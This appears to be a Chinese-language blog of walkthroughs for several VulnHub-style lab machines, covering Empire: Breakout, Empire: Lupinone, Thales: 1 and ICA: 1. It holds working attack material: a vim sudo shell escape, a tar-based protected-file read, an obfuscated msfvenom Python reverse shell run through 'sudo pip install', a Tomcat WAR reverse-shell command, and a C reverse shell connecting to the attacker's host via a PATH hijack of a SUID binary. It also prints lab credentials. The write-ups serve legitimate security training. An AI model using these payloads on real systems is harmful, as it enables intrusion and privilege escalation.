
pspy64看一眼进程

image-20240312223044369

image-20240312223123051

可知query.py脚本是以adrian的权限运行的,而我们又对query.py可写,反弹shell进msf里

image-20240312224901376

image-20240312225025961

image-20240312225037332

可以以root权限无密码用vim

sudo -u root /usr/bin/vim -c ':!/bin/sh'

image-20240312225218585

EMPIRE: BREAKOUT

sudo nmap -p80,139,445,10000,20000 -sV -O -sC 192.168.4.106
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-16 09:59 EDT
Nmap scan report for 192.168.4.106
Host is up (0.00023s latency).

PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10000/tcp open  http        MiniServ 1.981 (Webmin httpd)
|_http-title: 200 &mdash; Document follows
|_http-server-header: MiniServ/1.981
20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
|_http-title: 200 &mdash; Document follows
MAC Address: 08:00:27:13:16:82 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

Host script results:
| smb2-time: 
|   date: 2024-03-16T21:59:59
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: 7h59m57s
|_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.83 seconds

1000020000各起了个不同版本的MiniServ80是默认apache界面,但藏了

image-20240316221417643

image-20240316221443109

enum4linux -a ip来扫smb服务

image-20240316223343875

cyber:.2uqPEfj3D<P'a-3能登上Usermin后台

后台的tools->file manager中能读到user.txt

login->command shell能直接反弹个shell

image-20240316224601995

直接linpeas.sh+dirtypipe秒了

image-20240317151221685

看了一眼网上的,打法也有绕一点的

linpeas.sh能扫到一个tar

image-20240317153835245

通过getcap可以看到这个tar的具体权限

image-20240317154938386

image-20240317155220132

CAP_DAC_READ_SEARCH 使进程能够 绕过读取文件和读取和执行目录的权限

由于脚本限制了查看backup文件的条数,所以有个/var/backups/目录下的隐藏文件看不到

image-20240317160050517

可见是没有读取权限的,这个时候就可以利用上面的tar读取

tar xf "/var/backups/.old_pass.bak" -I '/bin/sh -c "cat 1>&2"'

image-20240317160318034

拿到root密码,su登陆

EMPIRE: LUPINONE

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-18 10:06 EDT
Nmap scan report for 192.168.4.107
Host is up (0.00022s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 ed:ea:d9:d3:af:19:9c:8e:4e:0f:31:db:f2:5d:12:79 (RSA)
|   256 bf:9f:a9:93:c5:87:21:a3:6b:6f:9e:e6:87:61:f5:19 (ECDSA)
|_  256 ac:18:ec:cc:35:c0:51:f5:6f:47:74:c3:01:95:b4:0f (ED25519)
80/tcp open  http    Apache httpd 2.4.48 ((Debian))
|_http-server-header: Apache/2.4.48 (Debian)
| http-robots.txt: 1 disallowed entry 
|_/~myfiles
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:F0:92:D1 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8, Linux 5.0 - 5.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.01 seconds

/~myfiles路径的404明显不一样,但是用gobuster去扫他的子目录什么都没扫到

得去扫/~目录才有东西

wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u "http://192.168.4.107/~FUZZ/" --hc 404

image-20240318221836831

Hello Friend, Im happy that you found my secret diretory, I created like this to share with you my create ssh private key file,
Its hided somewhere here, so that hackers dont find it and crack my passphrase with fasttrack.
I'm smart I know that.
Any problem let me know
Your best friend icex64

下一步找ssh私钥,也挺幽默的,用.开头来FUZZ

wfuzz -Z -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z list,txt-html -u "http://192.168.4.107/~secret/.FUZZ.FUZ2Z" --sc 200

image-20240318225341745

image-20240318225356002

拿到编码后的私钥

image-20240318225912055

跑一遍magic,转化成openssh的私钥

由于有提示

image-20240319132744135

利用ssh2john+fasttrack.txt来跑爆破

ssh2john ssh.key > hash
john --wordlist=/usr/share/wordlists/fasttrack.txt hash

ssh登陆即可

ssh -i ssh.key icex64@192.168.4.107

image-20240319133725529

icex64@LupinOne:/home/arsene$ cat note.txt 
Hi my friend Icex64,

Can you please help check if my code is secure to run, I need to use for my next heist.

I dont want to anyone else get inside it, because it can compromise my account and find my secret file.

Only you have access to my program, because I know that your account is secure.

See you on the other side.

Arsene Lupin.

icex64@LupinOne:/home/arsene$ cat heist.py
import webbrowser

print ("Its not yet ready to get in action")

webbrowser.open("https://empirecybersecurity.co.mz")

heist.py文件不可写也不可删除,所以没法在这里就水平越权

find . -name "*webbrowser*" 2>/dev/null

image-20240319134905422

可见这个webbrowser.py是可以随便动的

直接echo一个msfvenom生成的python shell进去

image-20240319140301990

image-20240319140343737

参考pip,直接再起一个shell

由于msf进的shell没有tty,所以先要转一下

python3 -c 'import pty; pty.spawn("/bin/bash")'

msfvenom再起一个别的端口的python反弹shell,同上

echo "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNo9UE1LxDAQPTe/orckGEO71rq7WEHEg4gIrrdlkTYZNTRNQpLVqvjf3ZDFywzvzZs3H2py1scyWDFCZN9aDWzoA7QNC9HvRWRRTYBerS/nUpnS9+YNSF3RNSqi/zrEInS5medEFuyIN4839y+b56fb6weadFxYY0BEQnC9WvC6XfKG19UZZhfLVUWTZvDQj6iAWYCLyTxN50EDOHJOke7yUnxvXC9Ggq/uMAvcg/ggDaXbaodkd8Saos93paHUYIikl/pgJ0/+q6eZpghmECTdzSUIOzkPIZD8Aj60TSIlJCX7wQGvwy9FfyRRXzk=')[0])))" > setup.py
sudo -u root pip install .

image-20240319143349834

THALES: 1

扫网发现只有228080,从8080的tomcat服务打起

扫网+msf拿后台

image-20240325143338021

use auxiliary/scanner/http/tomcat_mgr_login

image-20240325143359495

登进后台用war打一个反弹shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.4.103 LPORT=4444 -f war -o shell.war
use exploit/multi/handler
set PAYLOAD java/jsp_shell_reverse_tcp

image-20240325144349757

不过这样反弹的shell不方便,还是要另启一个msf

image-20240325145107943

image-20240325161155984

#!/bin/bash
####################################
#
# Backup to NFS mount script.
#
####################################

# What to backup. 
backup_files="/opt/tomcat/"

# Where to backup to.
dest="/var/backups"

# Create archive filename.
day=$(date +%A)
hostname=$(hostname -s)
archive_file="$hostname-$day.tgz"

# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"
date
echo

# Backup the files using tar.
tar czf $dest/$archive_file $backup_files

# Print end status message.
echo
echo "Backup finished"
date

# Long listing of files in $dest to check file sizes.
ls -lh $dest

linpeas查得到秘钥泄露

image-20240325163208157

john爬出来

image-20240325163224133

image-20240325163419334

拿到第一部分flag

image-20240325164925647

由于有个backup.sh不得不关注一下

image-20240325174435768

显然有以root权限执行backup.sh,而文件可写,直接反弹

image-20240325174517495

ICA: 1

扫网22,80,3306,qdPM 9.2的CMS泄露

all:
  doctrine:
    class: sfDoctrineDatabase
    param:
      dsn: 'mysql:dbname=qdpm;host=localhost'
      profiler: false
      username: qdpmadmin
      password: "<?php echo urlencode('UcVQCMQk2STVeS6J') ; ?>"
      attributes:
        quote_identifier: true  
    mysql -h 192.168.4.109 -uqdpmadmin -pUcVQCMQk2STVeS6J

翻一遍库拿到登陆号

image-20240325213947908

john跑不出来这个密码,只能改了

hash-identifier[跑一遍能看出加密方式加密

image-20240325220042101

同样的加密方式reset一遍登后台,qdPM9.2有RCE

但是用的最开始admin没法添加,自行加用户后上传附件

image-20240326121900055

拿到webshell之后考虑横向

linpeas找信息,出了一个有s位的二进制,逆向看一眼

image-20240326124522398

对于linux下system()函数的深度理解

在编写具有SUID/SGID权限的程序时请勿使用system(),system()会继承环境变量,通过环境变量可能会造成系统安全的问题。

有这句话做依托,可以操控环境变量和cat /root/system.info提权

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void){
    int port = 7890;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;       
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("192.168.4.103");

    connect(sockt, (struct sockaddr *) &revsockaddr, 
    sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"/bin/bash", NULL};
    execve("/bin/bash", argv, NULL);

    return 0;       
}
export PATH=/tmp:$PATH
cd /tmp
gcc cat.c -o cat

然后直接执行get_access文件就会执行/tmp目录下的cat提权

image-20240326203131760

DIGITALWORLD.LOCAL: ELECTRICAL

nmap给个suid用ping扫描才扫得出

└─$ nmap -p22,113,139,445 -sC -sV -O 192.168.4.118 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-01 09:23 EDT
WARNING: Running Nmap setuid, as you are doing, is a major security risk.

Nmap scan report for 192.168.4.118
Host is up (0.00031s latency).

PORT    STATE  SERVICE     VERSION
22/tcp  closed ssh
113/tcp open   ident?
|_auth-owners: root
139/tcp open   netbios-ssn Samba smbd 4.6.2
|_auth-owners: root
445/tcp open   netbios-ssn Samba smbd 4.6.2
|_auth-owners: root
MAC Address: 08:00:27:A3:22:38 (Oracle VirtualBox virtual NIC)
Aggressive OS guesses: Linux 5.0 - 5.4 (98%), Linux 4.15 - 5.8 (94%), Linux 5.0 - 5.5 (93%), Linux 5.1 (93%), Linux 2.6.32 - 3.13 (93%), Linux 2.6.39 (93%), Linux 5.0 (92%), Linux 2.6.22 - 2.6.36 (91%), Linux 3.10 - 4.11 (91%), Linux 5.4 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

Host script results:
| smb2-time: 
|   date: 2024-04-01T21:24:45
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: 7h59m59s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.12 seconds

开了个smb服务,但是没有什么可用

image-20240402095546523